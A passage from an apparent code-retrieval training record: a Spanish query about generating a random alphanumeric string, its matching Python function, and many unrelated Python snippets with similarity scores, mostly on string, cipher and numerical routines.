fit_logger.info(' {0}: {1}'.format(parname, newparval))\n self.model.parvals = parvals\n\n return np.ones_like(x)", "def par_test_13(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def run_local_search(self, k, x, x_f, xb, fxb, improve, search_range, g, task):\n for _ in range(self.num_searches):\n x, x_f, xb, fxb, improve, grade, search_range = self.local_searches[k](x, x_f, xb, fxb, improve, search_range, task, bonus1=self.bonus1,\n bonus2=self.bonus2, rng=self.rng)\n g += grade\n return x, x_f, xb, fxb, improve, search_range, g", "def convergentPointCheck(data, velocity):\n import astropy.units as u\n \n parallax = 1000/data.icrs.distance\n ra = data.icrs.ra.to(u.rad)\n dec= data.icrs.dec.to(u.rad)\n pm_ra_cosdec = data.icrs.pm_ra_cosdec*4.74047/parallax\n pm_dec = data.icrs.pm_dec*4.74047/parallax\n\n vpred = vecRot(velocity,'zyx', np.transpose(np.array([-ra, dec, np.zeros(ra.size)]))) # return vr, pm_ra_cosdec, pm_dec\n psi = np.arctan2(vpred[:,2],vpred[:,1]) # angle \n vpred_rot = vecRot(vpred, 'x', -psi)\n vobs = np.transpose([data.icrs.radial_velocity, pm_ra_cosdec, pm_dec])\n vobs_rot = vecRot(vobs, 'x', -psi)\n \n dmu_parallel = vobs_rot[:,1] - vpred_rot[:,1]\n dmu_perpendicular = vobs_rot[:,2] - vpred_rot[:,2]\n \n return dmu_parallel, dmu_perpendicular, psi", "def x2p(self, X=np.array([]), tol=1e-12, perplexity=30.0):\n\n # Initialize some variables\n # print(\"\\tComputing pairwise distances...\")\n (n, d) = X.shape\n sum_X = np.sum(np.square(X), 1)\n D = np.add(np.add(-2 * np.dot(X, X.T), sum_X).T, sum_X)\n P = np.zeros((n, n))\n beta = np.ones((n, 1)) / np.max(D) # modified\n logU = np.log(perplexity)\n\n # Loop over all datapoints\n for i in range(n):\n\n # Print progress\n # if i % 500 == 0:\n # print(\"\\tComputing P-values for point %d of %d...\" % (i, n))\n\n # Compute the Gaussian kernel and entropy for the current precision\n betamin = -np.inf\n betamax = np.inf\n Di = D[i, np.concatenate((np.r_[0:i], np.r_[i + 1:n]))]\n (H, thisP) = self.Hbeta(Di, beta[i])\n\n # Evaluate whether the perplexity is within tolerance\n Hdiff = H - logU\n tries = 0\n while np.abs(Hdiff) > tol and tries < 1000: #\n\n # If not, increase or decrease precision\n if Hdiff > 0:\n betamin = beta[i].copy()\n if betamax == np.inf or betamax == -np.inf:\n beta[i] = beta[i] * 2.\n else:\n beta[i] = (beta[i] + betamax) / 2.\n else:\n betamax = beta[i].copy()\n if betamin == np.inf or betamin == -np.inf:\n beta[i] = beta[i] / 2.\n else:\n beta[i] = (beta[i] + betamin) / 2.\n\n # Recompute the values\n (H, thisP) = self.Hbeta(Di, beta[i])\n Hdiff = H - logU\n tries += 1\n\n # Set the final row of P\n P[i, np.concatenate((np.r_[0:i], np.r_[i + 1:n]))] = thisP\n\n # Return final P-matrix\n # print(\"\\tMean value of sigma: %f\" % np.mean(np.sqrt(1 / beta)))\n self.beta = beta\n return P", "def par_test_11(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def _test_parallel_transport(self, k=None):\n import itertools\n\n if k is None:raise ValueError('This should not get called')\n\n s = space(curvature=k)\n\n # require -P + P = 0\n # require P + P = 2P\n # require P + P + P = 3P\n # for all K\n for rp in (\n ((), 1),\n ((1,), 1),\n ((1,), 3),\n ((3/5, 4/5), 1),\n ((-4/5, 3/5), 2),\n ((3/7, 0, -6/7, -2/7), 3),\n ((0, -18/25, 0, 0, 11/25, -12/25, -6/25), 3)\n ):\n p = s.make_point(rp[0], rp[1])\n self.assertTrue(isclose(\n abs(-p + p),\n 0,\n abs_tol=1e-12\n ))\n p2 = s.make_point(rp[0], rp[1] * 2)\n self.assertTrue(point_isclose(\n p + p,\n p2\n ))\n p3 = s.make_point(rp[0], rp[1] * 3)\n self.assertTrue(point_isclose(\n p + p + p,\n p3\n ))\n\n # require P + Q = Q + P\n # but only if K = 0\n for p, q in itertools.permutations(\n map(\n (lambda tup:s.make_point(tup, 3)),\n (\n (15/35, -18/35, -10/35, 24/35),\n (0, 0, 3/5, 4/5),\n (4/21, 8/21, 0, 19/21),\n (4/21, 1/21, -18/21, 10/21)\n )\n ),\n 2\n ):\n self.assertTrue(point_isclose(p + q, q + p) == (k==0))", "def param_locked_SA(fn, *x, **kwargs):\n num_steps=int(kwargs.get(\"num_steps\",10)) #num of locked values to test/param\n max_steps=int(kwargs.get(\"max_steps\",400)) #max num iterations for\n chi2_lim=int(kwargs.get(\"chi2_lim\",4))\n\n param_ranges={k:v for k,v in kwargs.iteritems() if not k in \"max_steps chi2_lim\".split()}\n param_samples, all_chi2=None,None\n epsilon=1./float(num_steps)\n for param, rng in param_ranges.iteritems():\n #lock each param\n for val in np.linspace(rng[0],rng[1], num_steps):\n #update the parameter and put into kwargs\n new_rng=[val,val]\n kwargs[param]=new_rng\n psamp, chi2=simulated_annealing(fn, *x, **kwargs)\n if all_chi2 is None:\n param_samples, all_chi2=psamp, chi2\n else:\n param_samples=np.concatenate((param_samples, psamp))\n all_chi2=np.concatenate((all_chi2, chi2))\n kwargs[param]=rng\n return param_samples, all_chi2", "def task_3():\n threshold = [0.86, 0.87, 0.88, 0.89]\n for t in threshold: \n # Create a list to store the number of iteration that DE converge \n # @ given threshold for p1(5, 40), p2(10, 20), p3(20, 10), p4(40, 5) \n iter_p1 = []\n iter_p2 = [] \n iter_p3 = [] \n iter_p4 = []\n \n # Create a list to store the cost at the end of the DE \n # p1(5, 40), p2(10, 20), p3(20, 10), p4(40, 5)\n cost_p1 = []\n cost_p2 = []\n cost_p3 = []\n cost_p4 = [] \n \n # Run the experiment and record the result for the given threshold\n experiment(t)\n \n # Loop over experiment and record the number of iteration of each set of param\n # for 30 times\n for i in range(30):\n record = experiment(t) # replace the argument with the testing threshold\n iter_p1.append(record[0][0])\n iter_p2.append(record[1][0])\n iter_p3.append(record[2][0])\n iter_p4.append(record[3][0])\n \n cost_p1.append(record[0][1])\n cost_p2.append(record[1][1])\n cost_p3.append(record[2][1])\n cost_p4.append(record[3][1])\n \n # Convert the result into a dictionary then transform it to a pandas DataFrame\n iteration_dict = {\"iteration(5,40)\":iter_p1, \"iteration(10,20)\":iter_p2, \n \"iteration(20,10)\": iter_p3, \"iteration(40,5)\": iter_p4}\n cost_dict = {\"cost(5,40)\": cost_p1, \"cost(10,20)\": cost_p2, \n \"cost(20,10)\": cost_p3, \"cost(40,5)\":cost_p4}\n df_iteration = pd.DataFrame.from_dict(iteration_dict) \n df_iteration.to_csv(\"iteration_\" + str(t) + \".csv\")\n \n df_cost = pd.DataFrame.from_dict(cost_dict)\n df_cost.to_csv(\"cost_\" + str(t) + \".csv\")", "def computeAnsSets(self, param_dict):\n self.writeSolverConfigFile(param_dict)\n # run the process\n process = subprocess.Popen(self.bash_cmd.split(), stdout=subprocess.PIPE)\n output = process.communicate()[0]\n return self.parseGeneratedProblems(output)", "def _compute_results(self):\n self.Y_best = best_value(self.Y)\n self.x_opt = self.X[np.argmin(self.Y),:]\n self.fx_opt = np.min(self.Y)\n self.distance = self._compute_distance_betw_consecutive_x()", "def FindGrid(self, p_float=..., p_float=..., p_float=..., *args, **kwargs):\n ...", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict" ]
[ "0.63042134", "0.6114993", "0.60271513", "0.57289815", "0.5670463", "0.56503326", "0.5637356", "0.56303936", "0.56074744", "0.55963916", "0.55750257", "0.5551854", "0.55409104", "0.55060744", "0.5505066", "0.5496916", "0.5489299", "0.5472598", "0.5471783", "0.5469413", "0.54585576", "0.5436822", "0.5431973", "0.5422025", "0.54209435", "0.54023135", "0.5395122", "0.5394043", "0.539095", "0.5360029", "0.5351787", "0.534769", "0.53409463", "0.53387696", "0.533672", "0.53271616", "0.5323371", "0.5318978", "0.53078735", "0.5303853", "0.5287954", "0.52846736", "0.52816814", "0.52806324", "0.52786136", "0.52783144", "0.52701867", "0.5265666", "0.5263008", "0.525754", "0.5257396", "0.5253716", "0.5252516", "0.52510434", "0.5247669", "0.52409625", "0.5239471", "0.52277136", "0.52233815", "0.5220306", "0.52180356", "0.52162474", "0.5214723", "0.5214658", "0.5214141", "0.5213613", "0.5213613", "0.5213613", "0.5205398", "0.5203822", "0.51935446", "0.519025", "0.51892304", "0.51806945", "0.51742214", "0.5170968", "0.51605296", "0.5158854", "0.51587546", "0.5158311", "0.5148954", "0.5144109", "0.5139736", "0.5135115", "0.51307786", "0.5126294", "0.5120899", "0.51154524", "0.51129633", "0.5110065", "0.5105413", "0.5104214", "0.5103355", "0.51015955", "0.509914", "0.50941217", "0.50926805", "0.5086668", "0.5086346", "0.5086277", "0.5084228" ]
0.0
-1
Genera una cadena aleatoria de caracteres, que puede contener numeros, letras mayusculas y letras minusculas, el primer caracter sera siempre una letra mayuscula.
def random_string(length=1, uppercase=False, lowercase=False): characters = digits code = str() if uppercase: characters += ascii_uppercase if lowercase: characters += ascii_lowercase while len(code) < length: character = choice(characters) if len(code) == 0: character = choice(ascii_uppercase) code += character return code
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def intercambiar_mayusculas_minusculas(cad):\n\n nueva_cad = \"\"\n\n for i in cad:\n if ord(i) < 64 or ord(i) > 122:\n nueva_cad = nueva_cad + i\n elif ord(i) < 97:\n nueva_cad = nueva_cad + chr(ord(i) + 32)\n else:\n nueva_cad = nueva_cad + chr(ord(i) - 32)\n\n print(nueva_cad)\n return nueva_cad", "def reg(letter,number):\n v=ord(letter.lower())-ord('a')\n v=v<<10\n v+=number\n return v", "def generar_contrasena():\n\n mayusculas = ['A', 'B', 'C', 'D', 'E', 'F', 'G']\n minusculas = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\n simbolos = ['!', '#', '$', '&', '/', '(', ')']\n numeros = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']\n\n caracteres = mayusculas + minusculas + simbolos + numeros\n contrasena = []\n\n for i in range(15):\n caracter_random = random.choice(caracteres)\n contrasena.append(caracter_random)\n\n contrasena = \"\".join(contrasena)\n return contrasena", "def n_char_generate(self,char,n):\n return char*n", "def RandomAlphaNumChar():\n num = random.randint(0, 26 + 26 + 10)\n if num < 26:\n return chr(num + 65)\n num -= 26\n if num < 26:\n return chr(num + 97)\n return chr(num + 48)", "def compile_word(word):\r\n\r\n if word.isupper():\r\n terms = [('%s*%s' % (10**i, d)) for (i,d) in enumerate(word[::-1])]\r\n return '(' + '+'.join(terms) + ')'\r\n else:\r\n return word", "def get_alphabet(number):\n return chr(number + 96)", "def get_alphabet(number):\n return chr(number + 96)", "def char_from_number(number):\r\n\r\n base = 26\r\n\r\n rval = \"\"\r\n\r\n if number == 0:\r\n rval = 'A'\r\n\r\n while number != 0:\r\n remainder = number % base\r\n new_char = chr(ord('A') + remainder)\r\n rval = new_char + rval\r\n number //= base\r\n\r\n return rval", "def generate(length):\n alpha = map(chr, range(97, 123))\n alpha.append(' ')\n result = \"\"\n for x in range(length):\n result += alpha[random.randrange(0,27)]\n return result", "def rotate_letter(c, num):\n return chr(((ord(c) - 97) + num) % 26 + 97)", "def compile_word(word):\n \n result = ''\n for i,ltr in enumerate(word):\n result = str(10**(len(word)-i-1)) + '*' + ltr + result\n if i != len(word)-1:\n result = '+' + result\n\n return result", "def calculate_construction(self, word):\r\n \r\n construction = \"\"\r\n for c in word.lower():\r\n if c in self.vowels:\r\n construction += \"v\"\r\n elif c in letters:\r\n construction += \"c\"\r\n return construction", "def convert_to_alphabet(c, avoid_tab_and_lf=False):\n if c == 1:\n return 32 if avoid_tab_and_lf else 9 # space instead of TAB\n if c == 127 - 30:\n return 92 if avoid_tab_and_lf else 10 # \\ instead of LF\n if 32 <= c + 30 <= 126:\n return c + 30\n else:\n return 0 # unknown", "def decrypt_cesar(new_word, number): #3\n decrypted_num = []\n for char in new_word:\n char = ord(char)\n decrypted_num.append(char)\n\n decrypted_word = []\n for num in decrypted_num:\n num = num - number\n decrypted_word.append(chr(num))\n\n return \"\".join(decrypted_word)", "def random_alpha_num_char():\n num = random.randint(0, 26 + 26 + 10)\n if num < 26:\n return chr(num + 65)\n num -= 26\n if num < 26:\n return chr(num + 97)\n return chr(num + 48)", "def majuscule(string):\n\n res = \"\"\n toChange = True\n\n for letter in string:\n value_letter = ord(letter)\n isLetter = 65 <= value_letter and value_letter <= 92 or 96 <= value_letter and value_letter <= 122\n if isLetter:\n if toChange:\n res += chr(ord(letter) - 32)\n else:\n res += letter\n toChange = not toChange\n else:\n res += letter\n\n print(res)", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def _algorithm(self, rut):\n suma = 0\n multi = 2\n for r in rut[::-1]:\n suma += int(r) * multi\n multi += 1\n if multi == 8:\n multi = 2\n return u'0123456789K0'[11 - suma % 11]", "def gen_chars(length, character):\n return ''.join([character for i in range(length)])", "def generate_sequence(sequence):\n if sequence[len(sequence) - 1] == 'Z':\n return sequence + \"A\"\n\n s = SeqGen(26, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n\n if sequence[0].isdigit() and sequence[0] == '9':\n sequence = list(sequence)\n sequence[0] = 'A'\n sequence = ''.join(sequence)\n elif sequence[0] == 'Z':\n sequence = list(sequence)\n sequence[0] = '0'\n sequence = ''.join(sequence)\n sequence = sequence[0] + increment(sequence[1:], s)\n else:\n sequence = list(sequence)\n sequence[0] = (chr(ord(sequence[0]) + 1))\n sequence = ''.join(sequence)\n return sequence", "def __generate_number_boleto_fake(self):\n numbers = \"0123456789\"\n return \"\".join(random.choice(numbers) for character in range(48))", "def encryptionMultipleRotate(text, power):\n s = text\n transformedChar = \"\"\n transformedChar = s[-power:] + s[:-(power)]\n\n print(\"Multiple Rotation Encrypted text : \" )\n return transformedChar", "def com(num):\n if num < 10:\n cad = '0000'+str(num)\n elif num < 100:\n cad = '000'+str(num)\n elif num < 1000:\n cad = '00'+ str(num)\n elif num < 10000:\n cad = '0'+ str(num)\n else:\n cad = str(num)\n return cad", "def letter_num(num: int):\n if abs(num) > 26 or num == 0:\n let = ord('a') + 26 - 1\n else:\n let = ord('a') + abs(num) - 1\n return chr(let)", "def compile_word(word):\n # Your code here.\n if word.isalpha() and word.islower():\n return word\n if not word.isalpha():\n return word\n result = []\n mul = 1\n word = word[::-1]\n for w in word:\n if w.isalpha and w.isupper():\n result.append(str(mul) + '*' + w + \"+\")\n else:\n result.append(w)\n mul = mul*10\n ans = ''.join(result)\n return ans[:-1]", "def random_charachter() -> chr:\r\n return chr(int(random.randrange(32, 126, 1)))", "def generateNchars(inputChar, inputNum):\n return inputChar * int(inputNum)", "def num_alphabet(first_val: str, second_val: str):\n el_1 = ord(first_val) - ord('a') + 1\n el_2 = ord(second_val) - ord('a') + 1\n distance = abs(el_2 - el_1 - 1)\n return f'Позиции букв: {el_1} и {el_2}. Между буквами символов: {distance} '", "def get_direction_letters(d):\n d_letters = ('N', 'NNE', 'NE', 'ENE', 'E', 'ESE', 'SE', 'SSE', 'S', 'SSW', 'SW', 'WSW', 'W', 'WNW', 'NW', 'NNW')\n x = int((d + 11.25) / 22.5) % 16\n return d_letters[x]", "def generador_password(tamm):\n\tif tamm == 0:\n\t\treturn chr(randint(33,122))\n\telif tamm == 2:\n\t\treturn chr(randint(33,47)) + generador_password(tamm-1)\n\telif tamm == 5:\n\t\treturn chr(randint(48,57)) + generador_password(tamm-1)\n\telif tamm == 10:\n\t\treturn chr(randint(65,90)) + generador_password(tamm-1)\n\telif tamm == 13:\n\t\treturn chr(randint(97,122)) + generador_password(tamm-1)\n\telse:\n\t\treturn chr(randint(33,122)) + generador_password(tamm-1)", "def wc(seq):\n return \"\".join(complement[nt] for nt in reversed(seq))", "def transcribe(seq):\n rna = ''\n for letter in seq:\n if letter == 'A':\n rna = rna + 'U'\n elif letter == 'T':\n rna = rna + 'A'\n elif letter == 'G':\n rna = rna + 'C'\n else:\n rna = rna + 'G'\n return rna", "def get_pattern(length = PATTERN_SIZE):\n pattern = ''\n parts = ['A', 'a', '0']\n while len(pattern) != length:\n pattern += parts[len(pattern) % 3]\n if len(pattern) % 3 == 0:\n parts[2] = chr(ord(parts[2]) + 1)\n if parts[2] > '9':\n parts[2] = '0'\n parts[1] = chr(ord(parts[1]) + 1)\n if parts[1] > 'z':\n parts[1] = 'a'\n parts[0] = chr(ord(parts[0]) + 1)\n if parts[0] > 'Z':\n parts[0] = 'A'\n return pattern", "def random_mutate(dna: str) -> str:\r\n result = \"\"\r\n for c in range(DNA_SIZE):\r\n if random.randrange(0, 100, 1) == 1:\r\n result += random_charachter()\r\n else:\r\n result += dna[c]\r\n return result", "def _getLilyAccidental(self):\n s = \"\"\n if self.accidental == 0:\n return \"\"\n elif self.accidental < 0:\n s = _LILYFLAT\n elif self.accidental > 0:\n s = _LILYSHARP\n return s * abs(self.accidental)", "def scramble(src):\n\n output = \"\"\n\n for each in src.lower():\n diff = ord(each) - ord('a')\n\n if diff >= 0 and diff < 26:\n output += chr(ord('a') + (25 - (ord(each) - ord('a'))))\n elif each >= '0' and each <= '9':\n output += each\n\n return output", "def chrNum(self, num):\n char = chr(num + 65) \n return char", "def revc(sequence):\n complements = {\n 'A': 'T',\n 'T': 'A',\n 'C': 'G',\n 'G': 'C',\n 'N': 'N',\n '.': '.',\n }\n\n def inner(sequence):\n for char in reversed(sequence):\n yield complements[char]\n\n sequence = sequence.upper()\n return ''.join(inner(sequence))", "def create_password(tamanho=12):\n from random import choice\n caracters = '0123456789abcdefghijlmnopqrstuwvxzkABCDEFGHIJLMNOPQRSTUWVXZK_#'\n senha = ''\n for char in xrange(tamanho):\n senha += choice(caracters)\n return senha", "def romanify(num):\n result = \"\"\n return result", "def decryptionMultipleRotate(text, power):\n s = text;\n transformedChar = \"\"\n transformedChar = s[power:] + s[0:power]\n\n print(\"Multiple Rotation Decrypted text : \" )\n return transformedChar", "def mcc():\n morse = {\"A\": \".-\",\n \"B\": \"-...\",\n \"C\": \"-.-.\",\n \"D\": \"-..\",\n \"E\": \".\",\n \"F\": \"..-.\",\n \"G\": \"--.\",\n \"H\": \"....\",\n \"I\": \"..\",\n \"J\": \".---\",\n \"K\": \"-.-\",\n \"L\": \".-..\",\n \"M\": \"--\",\n \"N\": \"-.\",\n \"O\": \"---\",\n \"P\": \".--.\",\n \"Q\": \"--.-\",\n \"R\": \".-.\",\n \"S\": \"...\",\n \"T\": \"-\",\n \"U\": \"..-\",\n \"V\": \"...-\",\n \"W\": \".--\",\n \"X\": \"-..-\",\n \"Y\": \"-.--\",\n \"Z\": \"--..\",\n \"0\": \"-----\",\n \"1\": \".----\",\n \"2\": \"..---\",\n \"3\": \"...--\",\n \"4\": \"....-\",\n \"5\": \".....\",\n \"6\": \"-....\",\n \"7\": '--...',\n \"8\": \"---..\",\n \"9\": \"----.\",\n \".\": \".-.-.-\",\n ',': \"--..--\"}\n\n print(morse[input('enter character to be converted').upper()])\n\n print(\n f'{morse[input(\"1:\").upper()]} '\n f'{morse[input(\"2:\").upper()]} '\n f'{morse[input(\"3:\").upper()]} '\n f'{morse[input(\"4:\").upper()]} '\n f'{morse[input(\"5:\").upper()]} '\n f'{morse[input(\"6:\").upper()]}')", "def CHAR(table_number):\n return unichr(table_number)", "def vigenere(phrase, clef, operation):\n sortie, i = \"\", 0\n for caract in phrase: #parcours de la chaine a traiter\n if operation == \"1\": #chiffrement\n sortie = sortie + chr((ord(caract) + ord(clef[i])) % 256)\n i = i + 1 #parcours de la cle\n if i > len(clef) - 1:\n i = 0 #fin de cle atteinte, on repart au debut\n elif operation == \"2\": #dechiffrement\n sortie = sortie + chr((ord(caract) - ord(clef[i])) % 256)\n i = i + 1\n if i > len(clef) - 1:\n i = 0\n return sortie", "def string(self,pos_0,pos_1,n):\r\n n=int(n)\r\n if pos_0 <10:\r\n pos_0=\"00\"+str(pos_0)\r\n elif pos_0<100:\r\n pos_0=\"0\"+str(pos_0)\r\n\r\n if n <10:\r\n n=\"0\"+str((n))\r\n \r\n\r\n\r\n if pos_1 <10:\r\n pos_1=\"00\"+str(pos_1)\r\n elif pos_1<100:\r\n pos_1=\"0\"+str(pos_1)\r\n\r\n\r\n\r\n\r\n #pos\r\n c=\"\"\r\n\r\n c=str(pos_0)+str(pos_1)+str(n)\r\n #print(\"c\",c)\r\n return c", "def random_char(alph):\n char = alph[rand_generator.randrange(len(alph))]\n return char", "def chr_mod(value: int) -> str:\n return Base64._CHARSET[value % len(Base64._CHARSET)]", "def base26(w):\n val = 0\n for ch in w.lower():\n next_digit = ord(ch) - ord('a')\n val = 26*val + next_digit\n return val", "def vec(c):\n nth_c = ord(c) - 97\n vector = [0]*26\n vector[nth_c] = 1\n return vector", "def rot(c,n):\n if 'a' <= c <= 'z': \n new_ord = ord(c) + n\n if new_ord > ord('z'):\n new_ord = new_ord - 26\n elif 'A' <= c <= 'Z': \n new_ord = ord(c) + n\n if new_ord > ord('Z'):\n new_ord = new_ord - 26\n else: \n new_ord = ord(c)\n return chr(new_ord)", "def as_chern_chars(self):\n #value = self.as_chern_chars_dict.get(self)\n if True: #value == None:\n \n #print \"on space\", self.space, \"with lambda_\", self.degree\n upto = ceil(self.degree/2.0)+1\n \n S = PowerSeriesRing(SR, \"t\")\n f = ( sum( [factorial(2*i - 2) * ExprWithData.get_gen(chern_char(self.space, 2*i-1)).expr * S.gen()**(2*i-1) for i in range(1, upto)] ) ).exp(self.degree+1)\n #print f\n #print f.coefficients()\n value = ExprWithData(f[self.degree]) #wow, way faster to use indexing rather than coefficients list\n #self.as_chern_chars_dict[self] = value\n return value", "def caesar(m, ch, shift, modulo, start):\n if (m == CipherMode.M_DECIPHER):\n shift = -shift\n\n n = (ch-start) + shift\n n = n % modulo\n if n < 0:\n n += modulo\n return start + n", "def int_to_alpha(num):\n remainder = num\n text = []\n if num >= 26:\n major = remainder // 26\n text.append(ascii_lowercase[remainder // 26 - 1])\n remainder -= major * 26\n text.append(ascii_lowercase[remainder])\n return \"\".join(text)", "def rot(c, n):\n if 'a' <= c <= 'z':\n l = ord(c) + n\n if l > ord('z'):\n l -= 26\n return chr(l)\n elif 'A' <= c <= 'Z':\n l = ord(c) + n\n if l > ord('Z'):\n l -= 26\n return chr(l)\n else:\n return c", "def invertir_cadena(texto):\n if isinstance(texto, str):\n resultado = ''\n\n for i in range(len(texto) - 1, -1, -1):\n resultado += texto[i]\n \n return resultado\n else:\n raise TypeError('No se ha especificado una cadena de caracteres como argumento.')", "def make_control_character():\n # Add one character made up of one codepoint each from\n # (High Surrogates + High Private Use Surrogates) and Low Surrogates.\n # We expect each such pair to behave as a single high-codepoint\n # character.\n controls = ('0000', '001F')\n return [unicode_char(char)\n for char in range(int(controls[0], 16), int(controls[1], 16)+1)]", "def gen_alphabet():\n for x in list(xrange(ord('a'),ord('z')+1)):\n yield chr(x)", "def prefer_alphabet(i):\n if 0 <= i <= 25:\n return chr(i + 65)\n if 26 <= i <= 51:\n return chr(i + 97 - 26)\n return str(i)", "def generate(\n self, length=None, uppercase=None, lowercase=None, digits=None, special=None\n ):\n if length is None:\n length = self.length\n \n allowed_chars = \"\"\n\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else \"\"\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else \"\"\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n\n if digits is not None:\n allowed_chars += all_digits if digits else \"\"\n elif self.digits:\n allowed_chars += all_digits\n\n if special is not None:\n allowed_chars += punctuation if special else \"\"\n elif self.special:\n allowed_chars += punctuation\n\n return \"\".join(choice(allowed_chars) for _ in range(length))", "def genereaza_codificare():\n codificare = \"\"\n litere_alfabet = get_litere_alfabet()\n while len(codificare) < 26:\n litera_aleasa = random.choice(litere_alfabet)\n litere_alfabet.remove(litera_aleasa)\n codificare += litera_aleasa\n return codificare", "def toRoman(n):\n pass", "def to_alphabet(self, number):\n if not isinstance(number, int):\n raise TypeError('number must be an integer')\n\n result = ''\n al_len = self.alphabet_len\n\n if 0 <= number < al_len:\n return self.__alphabet[number]\n\n while number != 0:\n number, i = divmod(number, al_len)\n result = self.__alphabet[i] + result\n\n return result", "def _get_random_number_code(self):\r\n return \"str(random.randint(0, 1e9))\"", "def gen_code():\n return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(10)])", "def letter_code(letter):\n value = ord(letter.lower()) - ord('a') + 10\n return value + value // 11", "def english(number):\r\n if number == 0:\r\n return 'zero'\r\n word = ''\r\n for step in itertools.count():\r\n number, rest = divmod(number, 1000)\r\n word = format_num(en3(rest), step) + word\r\n if number == 0:\r\n return word.strip()", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def rotate(word_to_rotate,how_much):\n\thow_much-=26*(how_much/26)\t\n\t\n\tlength=len(word_to_rotate)\n\tk=0\n\tword=[0]*len(word_to_rotate)\n\twhile k < length:\n\t\tm_ord=ord(word_to_rotate[k])+how_much\n\t\tif m_ord>122:\n\t\t\tm_ord-=26\n\n\t\tm_chr=chr(m_ord)\n\t\tword[k]=m_chr\t\t\n\t\t#print m,\n\t\tk=k+1\n\tword2=''.join(word)\n\treturn word2", "def minuscule(product):\n product = product.lower()\n return product", "def construct(self, current, target):\n nfilled = int(current / target * self.length)\n return self._filledChar*nfilled + self._emptyChar*(self.length-nfilled)", "def create_character() -> list:\n return [0, 0]", "def get_litere_alfabet():\n litere_alfabet = list()\n prima_litera_alfabet = 97\n ultima_litera_alfabet = 97 + 26\n for litera in range(prima_litera_alfabet, ultima_litera_alfabet):\n litere_alfabet.append(chr(litera))\n return litere_alfabet", "def random_char():\n return chr(random.randrange(32, 126, 1))", "def get_complement(c):\n if c == 'A':\n return 'T'\n if c == 'C':\n return 'G'\n if c == 'G':\n return 'C'\n if c == 'T':\n return 'A'", "def alphabator(lst):\r\n n = 0\r\n for item in lst:\r\n n += 1\r\n if isinstance(item, int) and 1 <= item <= 26:\r\n item = chr(64 + item)\r\n yield item", "def RandomAlphaNumWord(length):\n return ''.join([RandomAlphaNumChar() for _ in range(0, length)])", "def decade(palabra):\n try:\n return palabra[:-1] + '0'\n except:\n return palabra", "def string(self):\n text = \"\"\n for char, qty in self.chars.items():\n text += char * qty\n return \"\".join(sorted(text))", "def GenZeroStr(n):\n\n return \"\".join([\"0\"] * n)", "def mostraCotxe(self):\n return str(self._l[0])+\" 